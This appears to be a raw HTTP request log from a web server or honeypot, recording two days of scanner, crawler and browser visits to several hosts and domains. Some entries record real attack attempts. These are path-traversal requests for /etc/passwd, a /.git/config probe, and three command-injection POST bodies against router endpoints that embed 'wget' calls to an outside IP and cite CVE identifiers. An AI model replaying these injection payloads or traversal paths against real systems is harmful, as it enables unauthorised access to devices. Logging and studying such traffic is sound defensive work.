RemoteAddr: 172.30.0.12:40894
Path: /
URL: /
Method: GET
[2026-02-27 06:11:12] === HTTP Request ===
===================
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.61:22453
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-02-27 05:27:36] === HTTP Request ===
[2026-02-27 05:27:30] Main page accessed - IP: 64.62.156.59:7709
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.59:7709
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-02-27 05:27:30] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.58:28881
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 05:26:40] === HTTP Request ===
[2026-02-27 05:25:48] Main page accessed - IP: 64.62.156.52:35656
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.52:35656
Path: /
URL: /
Method: GET
[2026-02-27 05:25:48] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:39924
Path: /jars
URL: /jars
Method: GET
[2026-02-27 05:14:05] === HTTP Request ===
[2026-02-27 04:42:58] Main page accessed - IP: 205.210.31.224:60144
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 205.210.31.224:60144
Path: /
URL: /
Method: GET
[2026-02-27 04:42:58] === HTTP Request ===
[2026-02-27 04:00:36] Main page accessed - IP: 205.210.31.74:57588
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 205.210.31.74:57588
Path: /
URL: /
Method: GET
[2026-02-27 04:00:36] === HTTP Request ===
===================
Dnt: 1
Cache-Control: max-age=0
Accept-Language: en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 111.7.96.162:56882
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 03:45:18] === HTTP Request ===
[2026-02-27 03:45:14] Login page accessed - IP: 111.7.96.162:56060
===================
Accept-Language: en
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Referer: http://anzan.tech:8081/
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 111.7.96.162:56060
Path: /login
URL: /login
Method: GET
[2026-02-27 03:45:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Referer: http://anzan.tech:8081/
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 111.7.96.162:55822
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-27 03:45:13] === HTTP Request ===
===================
Accept-Encoding: gzip
Referer: http://anzan.tech:8081/
Accept-Language: en
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 111.7.96.162:55824
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-27 03:45:13] === HTTP Request ===
===================
Accept-Language: en;q=0.9
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua-Mobile: ?0
Cache-Control: no-cache
Accept-Encoding: gzip
Sec-Fetch-Mode: navigate
Pragma: no-cache
Sec-Fetch-Site: none
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 123.160.223.74:31397
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 03:45:13] === HTTP Request ===
[2026-02-27 03:45:12] Main page accessed - IP: 111.7.96.162:55650
===================
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Accept-Language: en
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 111.7.96.162:55650
Path: /
URL: /
Method: GET
[2026-02-27 03:45:12] === HTTP Request ===
[2026-02-27 03:45:09] Login page accessed - IP: 47.254.76.66:44346
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept-Language: en
Accept-Encoding: gzip
Referer: http://livepoll.ru:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 47.254.76.66:44346
Path: /login
URL: /login
Method: GET
[2026-02-27 03:45:09] === HTTP Request ===
===================
Accept-Language: en
Accept-Encoding: gzip
Referer: http://livepoll.ru:8081/
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 47.254.76.66:44342
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-27 03:45:08] === HTTP Request ===
===================
Accept-Language: en
Accept-Encoding: gzip
Referer: http://livepoll.ru:8081/
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 47.254.76.66:44334
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-27 03:45:08] === HTTP Request ===
[2026-02-27 03:45:07] Main page accessed - IP: 111.7.96.162:54654
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Cache-Control: max-age=0
Accept-Language: en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Dnt: 1
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 111.7.96.162:54654
Path: /
URL: /
Method: GET
[2026-02-27 03:45:07] === HTTP Request ===
[2026-02-27 03:45:07] Main page accessed - IP: 47.254.76.66:44332
===================
Accept-Language: en
Accept-Encoding: gzip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 47.254.76.66:44332
Path: /
URL: /
Method: GET
[2026-02-27 03:45:07] === HTTP Request ===
[2026-02-27 03:45:06] Main page accessed - IP: 123.160.223.74:30654
===================
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Pragma: no-cache
Accept-Encoding: gzip
Sec-Fetch-Site: none
Cache-Control: no-cache
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en;q=0.9
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 123.160.223.74:30654
Path: /
URL: /
Method: GET
[2026-02-27 03:45:06] === HTTP Request ===
===================
Sec-Fetch-Dest: document
Sec-Fetch-User: ?1
Sec-Ch-Ua-Mobile: ?0
Pragma: no-cache
Accept-Language: en;q=0.9
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: gzip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Cache-Control: no-cache
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.160.223.74:30202
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 03:45:03] === HTTP Request ===
[2026-02-27 03:44:59] Login page accessed - IP: 47.251.186.126:46076
===================
Accept-Language: en
Accept-Encoding: gzip
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.251.186.126:46076
Path: /login
URL: /login
Method: GET
[2026-02-27 03:44:59] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Language: en
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.251.186.126:46068
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-27 03:44:58] === HTTP Request ===
===================
Accept-Language: en
Accept-Encoding: gzip
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.251.186.126:46074
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-27 03:44:58] === HTTP Request ===
[2026-02-27 03:44:57] Main page accessed - IP: 47.251.186.126:46066
===================
Accept-Language: en
Accept-Encoding: gzip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.251.186.126:46066
Path: /
URL: /
Method: GET
[2026-02-27 03:44:57] === HTTP Request ===
[2026-02-27 03:44:56] Main page accessed - IP: 123.160.223.72:57357
===================
Sec-Fetch-Site: none
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Pragma: no-cache
Sec-Fetch-Dest: document
Accept-Language: en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip
Sec-Fetch-Mode: navigate
Cache-Control: no-cache
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.160.223.72:57357
Path: /
URL: /
Method: GET
[2026-02-27 03:44:56] === HTTP Request ===
[2026-02-27 03:44:40] Main page accessed - IP: 47.250.179.242:20880
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.250.179.242:20880
Path: /
URL: /
Method: GET
[2026-02-27 03:44:40] === HTTP Request ===
[2026-02-27 03:05:09] Main page accessed - IP: 172.30.0.12:51526
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51526
Path: /
URL: /
Method: GET
[2026-02-27 03:05:09] === HTTP Request ===
[2026-02-27 01:48:13] Main page accessed - IP: 176.65.149.45:48614
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:48614
Path: /
URL: /
Method: GET
[2026-02-27 01:48:13] === HTTP Request ===
[2026-02-27 01:06:33] Main page accessed - IP: 205.210.31.43:61024
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.43:61024
Path: /
URL: /
Method: GET
[2026-02-27 01:06:33] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:49176
Path: /..\..\..\..\..\..\etc\passwd
URL: /..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
Method: GET
[2026-02-27 00:32:25] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:49166
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-02-27 00:32:25] === HTTP Request ===
[2026-02-27 00:32:07] Login page accessed - IP: 193.142.146.230:60408
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.142.146.230:60408
Path: /login
URL: /login
Method: GET
[2026-02-27 00:32:07] === HTTP Request ===
===================
Referer: http://95.143.191.38:8081/
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Accept-Language: en-US,en;q=0.5
Sec-Gpc: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Fetch-Mode: navigate
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 142.93.254.132:34466
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 00:31:41] === HTTP Request ===
[2026-02-27 00:31:41] Main page accessed - IP: 142.93.254.132:34456
===================
Sec-Fetch-User: ?1
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 142.93.254.132:34456
Path: /
URL: /
Method: GET
[2026-02-27 00:31:41] === HTTP Request ===
[2026-02-26 23:06:57] Main page accessed - IP: 198.235.24.180:64048
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: mail.anzan.tech
RemoteAddr: 198.235.24.180:64048
Path: /
URL: /
Method: GET
[2026-02-26 23:06:57] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:57806
Path: /jars
URL: /jars
Method: GET
[2026-02-26 22:10:04] === HTTP Request ===
[2026-02-26 20:55:37] Main page accessed - IP: 198.235.24.168:58528
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 198.235.24.168:58528
Path: /
URL: /
Method: GET
[2026-02-26 20:55:37] === HTTP Request ===
[2026-02-26 20:50:08] Main page accessed - IP: 198.235.24.181:56055
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.181:56055
Path: /
URL: /
Method: GET
[2026-02-26 20:50:08] === HTTP Request ===
[2026-02-26 20:04:11] Main page accessed - IP: 176.65.149.45:50440
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:50440
Path: /
URL: /
Method: GET
[2026-02-26 20:04:11] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:46648
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-02-26 19:48:14] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.34.212.9:46638
Path: /..\..\..\..\..\..\etc\passwd
URL: /..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
Method: GET
[2026-02-26 19:48:12] === HTTP Request ===
[2026-02-26 18:38:24] Main page accessed - IP: 64.23.214.73:38312
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.23.214.73:38312
Path: /
URL: /
Method: GET
[2026-02-26 18:38:24] === HTTP Request ===
[2026-02-26 18:03:26] Main page accessed - IP: 45.156.128.37:60115
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.128.37:60115
Path: /
URL: /
Method: GET
[2026-02-26 18:03:26] === HTTP Request ===
===================
Body: pingMode=tranceroute&action=&hop=1&domain=`a%3Bwget+http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2025-7414+-O+%2Fdev%2Fnull%3Ba`&ip=&packetSize=&pro_ver=&timeout=
User-Agent: Mozilla/1.0
Connection: close
Cookie: O3V2.0_user=admin
Origin: http://95.143.191.38
Content-Length: 168
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:12684
Path: /goform/setPingInfo
URL: /goform/setPingInfo
Method: POST
[2026-02-26 17:19:11] === HTTP Request ===
===================
Body: {"ip":"127.0.0.1; echo \"[[[\";a;wget http://185.93.89.75/8081_JF0BED0BJB0DI_CVE-2018-18852 -O /dev/null;a","pid":1,"Times":1}
Connection: close
Authorization: Bearer Basic YWRtaW46YWRtaW...
Content-Type: application/json
User-Agent: Mozilla/1.0
Content-Length: 126
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:40266
Query: cgi=PING&mode=9
Path: /cgi-bin/main.cgi
URL: /cgi-bin/main.cgi?cgi=PING&mode=9
Method: POST
[2026-02-26 14:53:06] === HTTP Request ===
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.133.102:53900
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-26 14:39:01] === HTTP Request ===
===================
Connection: close
Referer: http://95.143.191.38:8081
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.133.102:53858
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-26 14:39:01] === HTTP Request ===
[2026-02-26 14:39:00] Main page accessed - IP: 152.32.133.102:53838
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.133.102:53838
Path: /
URL: /
Method: GET
[2026-02-26 14:39:00] === HTTP Request ===
[2026-02-26 14:38:59] Main page accessed - IP: 152.32.133.102:53544
===================
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 152.32.133.102:53544
Path: /
URL: /
Method: GET
[2026-02-26 14:38:59] === HTTP Request ===
[2026-02-26 14:08:58] Main page accessed - IP: 45.156.129.132:57051
===================
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.132:57051
Path: /
URL: /
Method: GET
[2026-02-26 14:08:58] === HTTP Request ===
===================
Body: f_smtpserver=;a%3Bwget+http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2018-25120+-O+%2Fdev%2Fnull%3Ba;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/1.0
Content-Length: 106
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:28392
Path: /goform/Mail_Test
URL: /goform/Mail_Test
Method: POST
[2026-02-26 12:34:43] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 195.178.110.28
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51020
Path: /.git/config
URL: /.git/config
Method: GET
[2026-02-26 12:01:56] === HTTP Request ===
===================
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
From: oai-searchbot(at)openai.com
X-Forwarded-For: 74.7.244.26
Via: 2.0 Caddy
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53726
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-26 11:43:29] === HTTP Request ===
[2026-02-26 11:43:28] Main page accessed - IP: 172.30.0.12:53726
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.242.5
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
